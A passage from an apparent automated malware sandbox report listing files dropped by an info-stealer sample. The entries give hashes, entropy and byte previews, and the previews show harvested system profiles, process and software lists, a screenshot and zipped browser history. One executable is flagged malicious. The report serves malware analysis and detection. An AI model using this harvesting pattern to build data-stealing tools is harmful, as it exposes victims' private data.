                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):282
                                                                                                                                                                                                                                Entropy (8bit):3.5191090305155277
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                                                                                                                                                                                MD5:3A37312509712D4E12D27240137FF377
                                                                                                                                                                                                                                SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                                                                                                                                                                                SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                                                                                                                                                                                SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                                                                                                MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                                                                                                SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                                                                                                SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                                                                                                SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                                                                                                MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                                                                                                SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                                                                                                SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                                                                                                SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):504
                                                                                                                                                                                                                                Entropy (8bit):3.514398793376306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                                                                                                MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                                                                                                SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                                                                                                SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                                                                                                SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):666
                                                                                                                                                                                                                                Entropy (8bit):4.1767529471416305
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:pYzZfpfafETeoJtiAcYVmdy7NuhNNONA6r:psZfBafEVUYV97yNNOK4
                                                                                                                                                                                                                                MD5:E53361E9619346019167BF01B27D83C3
                                                                                                                                                                                                                                SHA1:1B56B44AC508244A65B51FD917457F4F16D7EFC5
                                                                                                                                                                                                                                SHA-256:14EE59FBE12E32BF2913317141D71A477CEA5D6F74BAAD293FA7A0FCA7286ED3
                                                                                                                                                                                                                                SHA-512:E6B30C41B536BEC08CF1D644FD0CB22427B297096E35C2EE058C0DDE6F2EE352C83C5DDD9566CD04ACFE64605C4BC094B433566B4EB5D23374298CA1E76C2CC5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview: ==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 134349/user. ClipBoard : . Launch : C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe. ==================================================. Screen resolution : 1280x1024. Current time : 07/07/2024 12:52:20. HWID : 3408D440A4. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : 1BUBDD. ==================================================. IP Geolocation : 8.46.123.33 [United States]. Log Date : 07/06/2024 7:27. BSSID : 00:50:56:a7:21:15. ==================================================
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):241
                                                                                                                                                                                                                                Entropy (8bit):5.130503875493093
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:LO8aRH+39z3q9oH+3GIdKeSuPUOJlgPN3dwbFquqs3o:idRH+5+zd6uPUycUhW
                                                                                                                                                                                                                                MD5:2CC99D7F6F68BDCF8752EF80DE256794
                                                                                                                                                                                                                                SHA1:0EDB2377502E584BED20FE28001A964F6B8E66D9
                                                                                                                                                                                                                                SHA-256:938DE1066B196DEDE78E7B82098436062335D3A9F568C6C65B15AC0E70509AEC
                                                                                                                                                                                                                                SHA-512:8C677FF4B66C38F841594D3B8C5F4A9D1BD02E1E59C0E91EFB4BB05C5A8F9F21BDFB93CC3A73439CF9558E367DD9C157348C391904DAED57DCE9CCB17F3CE352
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Google Chrome..Microsoft Edge..Microsoft Edge Update..Microsoft Edge WebView2 Runtime..Java Auto Updater..Java 8 Update 381..Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532..Office 16 Click-to-Run Extensibility Component..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):14758
                                                                                                                                                                                                                                Entropy (8bit):5.565076862729123
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O6OyMtMyMIm8w9qDiteO7BDM7MSMMtMgQ:OUMtMyMIAgOtekDM7MfMtMgQ
                                                                                                                                                                                                                                MD5:656EA2C9B68F172046846E91335AEDA2
                                                                                                                                                                                                                                SHA1:5FE85471E5BEB17C3B5C368BF20153338C185BDB
                                                                                                                                                                                                                                SHA-256:058AF2C2CA34760308CF10656054032816D22097B9261E83BAF3A67045BBE3DD
                                                                                                                                                                                                                                SHA-512:68662F0E29107192D8C86E2DCFE3330DA22BB1AD0945B4968B2617667273FF9E1CC900E99E94C0C62E7F3BA7F1D5B023E70C0D98947C1FEEA1AB912E66E6F66E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: svchost.EXE: ..NAME: explorer.EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost.EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost.EXE: ..NAME: smartscreen.EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost.EXE: ..NAME: svchost.EXE: ..NAME: csrss.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: svchost.EXE: ..NAME: sihost.EXE: C:\Windows\system32\sihost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\Wnbvwn
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):600735
                                                                                                                                                                                                                                Entropy (8bit):7.9414131183196
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:NQXRS5TgTxOrUcvYrSnYqv4Jsduat3HFCN4aWVsVk1B7oTLG2CG7R7:NQXR/OLKSYqrb3kSXmOBUXG2CS7
                                                                                                                                                                                                                                MD5:3D65115D06059C5DE3C57BFD97520291
                                                                                                                                                                                                                                SHA1:375C87AB5F12C1D328B69A0BAEC57048FBF213FC
                                                                                                                                                                                                                                SHA-256:F98E0CF1C898F86EE38AFCD23C153D621326200A4F952729C27504B35B60D498
                                                                                                                                                                                                                                SHA-512:6A1B0AC692B328C077B241A38A940AB3092EE9855A1B69322418575A309D1CEFB6B5907C442007F743A46B9D885BAEC08F75C03C67E40490F8F574A43202C44E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.........n.d.u....^.s.}..6f....d.1f6 ..B.1.......@Hh.1.....OVd........xVfFDF.....]........p.8r\z.....1zE.a..Y..h?.^.s7..1./....x...L_.B...E..CYzq>F/~>.K/.`V..+.)Y.G..{.......<w5.-..,=;.W..3s...k..........lY.."..8%....gc......>...r..d:.6+...\......r.._%?...,O.._..........C..0.r.z.......eY.5>_..l3.s..$..=.g.....\..9k....f...........R.{.5.70.6= ...1/,.......5Xy@......}...&....${...}.+..9.,.....9..{q.L...I.....0n....).5...@."&`....|.n.ih~W..<.c+.s...+s_.{`../...o...#X.y"d...8.q\.6..@.z/kV..6a......[F...s....+h....../.u\Y...Q....u....v.'`..u....."g.6......b\.K. .=....Io.s...z]...k...1...~..5...yTc...p-...r..6V.+..^..=.#...._.%9.#...}lE..E....S.w...O.,..N.k`...>...u.Go.5.q.|.....Y.X.,.qT.[....e.F?..z...!9a...+[%.=.[.]~.U.9..a.=@c....~.o.&?...5=...|OP\......e...^.k..o.Sz.>.)z...'....M..#2._r...9..=e.bR.".?.iF....f..t..I...[...Q.......:...1.!.;.........Z.......
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):631296
                                                                                                                                                                                                                                Entropy (8bit):7.5120496811594455
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:22QRXDD1yed0fsU4GSWgOvPESGj4s32xEdRCSHsjAZi96VG6wl:22Q9NXw2/wPOjdGxYADEVU
                                                                                                                                                                                                                                MD5:BED8CDCED2D57BE2BD750F0F59991ECD
                                                                                                                                                                                                                                SHA1:4E2A885B9387FCF040B7EB79892DE2F9FE55BCA4
                                                                                                                                                                                                                                SHA-256:5F628663F71E3BAA55F10E6021597F7860BEF868284EB50B8958169DCBBFF4FD
                                                                                                                                                                                                                                SHA-512:B85990A778C2462D57C3B314270BD1F397749450E75508E1012A14F21661358B98021EFB791F694D9EB05F49B0776EA3FF4C803F842F858DB5669968C477433F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 56%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........g...N..........(L...............................................(p...*..(....*.s ...z.*z.,..{$...,..{$...o......(*...*.s.....%...*.s.....*...*.(....*.(E...*Z.~....~(...o+...(@...*j~'...o+...('...(P...(\...*.s...../...*.(S...*.(-...*~r...p(.....3...r...p(.....4...*rsJ....5...~5.....oK....6...*b~8...,.~8...o......8...*.(....-..*.*.....*..s.....o....(.......P...s....(....tk...(.... ....(....*~r...p(.....J...r...p(.....K...*..(...+.o^...-....(...+oh....K...*J.o....%(....
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):1.307357139762978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
                                                                                                                                                                                                                                MD5:903B35CC93140E6701E12935809482FF
                                                                                                                                                                                                                                SHA1:151945AE040484CD8091AC5F2B9219AFF3B4BB5C
                                                                                                                                                                                                                                SHA-256:9C0C945FDF7870B6862697380E5E3499CC5508B04FAAC0A88285D4F1A205979C
                                                                                                                                                                                                                                SHA-512:83077F4889CD1FFABFED699E1B0AF06C28F18FD33E54F46208E97DDDFD96DB1014715CB305948B3E4FCE0C0F6769F2040121DE542F789264E39B63EA400D00D4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xde0513c7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):0.42216414813644
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                                                                                                                                                                                                                                MD5:683EB41DA3AE4EC53C58486649FEDCE9
                                                                                                                                                                                                                                SHA1:6B0223566587A0E1F4C088FE4A8115E0664A41E6
                                                                                                                                                                                                                                SHA-256:5D3AD4059377B79F3DAAA005B6A091B24F372FB8BA0DF7DCBC521A23627AC472
                                                                                                                                                                                                                                SHA-512:D7B1C03C3874D4AA29B12E1892697BB796A0261E7E2C136C411A61FEED8688634A0A947113431F5974C64892BA87EF044CDF95818F9545D0DAA6B6A8F1717FF9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:....... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.....................................r.....|..................i.|......|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                                                Entropy (8bit):0.07641219172467485
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:j1KYeZYZUWjn13a/euj6UwllcVO/lnlZMxZNQl:pKzZ0L53qeFLOewk
                                                                                                                                                                                                                                MD5:B864108CFE7D4CEC44C856FF718BB304
                                                                                                                                                                                                                                SHA1:3F90EB86312F577F277037DBD04C154372CAF73E
                                                                                                                                                                                                                                SHA-256:A8161629D3CB7A0726503724281DB4BEEC4F46F5A1E880526C512D1D1DCACA70
                                                                                                                                                                                                                                SHA-512:64F652A607FEC420AC6F48846546EEA075155A0F2D9A5FEB8C523ADB0221EE34B63AB0EF0962C5BCBC8272338CDA3EFBC316F7D9B5429DAC68822CD52D461D97
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Z_......................................;...{.......|.......{A..............{A......{A..........{A]................i.|......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:0
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):142139
                                                                                                                                                                                                                                Entropy (8bit):7.9197584607150535
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:F3JgVmHKmfMMhQR63uGXg84CmnIGuhx5355TwvuYn+AH:gVmHKMMMSR63uog8tmnIL5Xwmw3
                                                                                                                                                                                                                                MD5:89ED2F8ACFB6F72DF9919D57B66367B1
                                                                                                                                                                                                                                SHA1:64B838CE73234B6F94FCA685D5D6C415F880CE3F
                                                                                                                                                                                                                                SHA-256:92CAE5D67E4671AFF04B13ED652AFC687702B52C9A558D24A692DFE4CA1E9F39
                                                                                                                                                                                                                                SHA-512:D0381CE44C584345B0377ECDCD694BAA47435F7DFC2BC2D5E55C3AD1D14A7F97A7FFBC78E9DD2121478DAA1B55DE53578C0D8075D90B2F5FF9A66F58DDAE4558
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK.........Q.X................Browsers\Edge\PK........o;.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........o;.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK........o;.X..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK........o;.X1.#.>...5.......Directories\Desktop.txteR.n. .|.I..4i.@.....PI.vm.w.m.?..V..ycN...C....:.??E......8 ..&.J...0Bv....H+\%EW.6...8s$...a..&.7.....<...B...g.,$hw.ad..D..+4.n.QcM^'8I[4\.?.u.k.7,h....k....*..B.+o3...dEq...W..D"....+5.WZ.f.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):105
                                                                                                                                                                                                                                Entropy (8bit):3.8863455911790052
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                                                                                                                                                                                MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                                                                                                                                                                                SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                                                                                                                                                                                SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                                                                                                                                                                                SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):94
                                                                                                                                                                                                                                Entropy (8bit):4.886397362842801
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                                                                                                                                                                                MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                                                                                                                                                                                SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                                                                                                                                                                                SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                                                                                                                                                                                SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1393
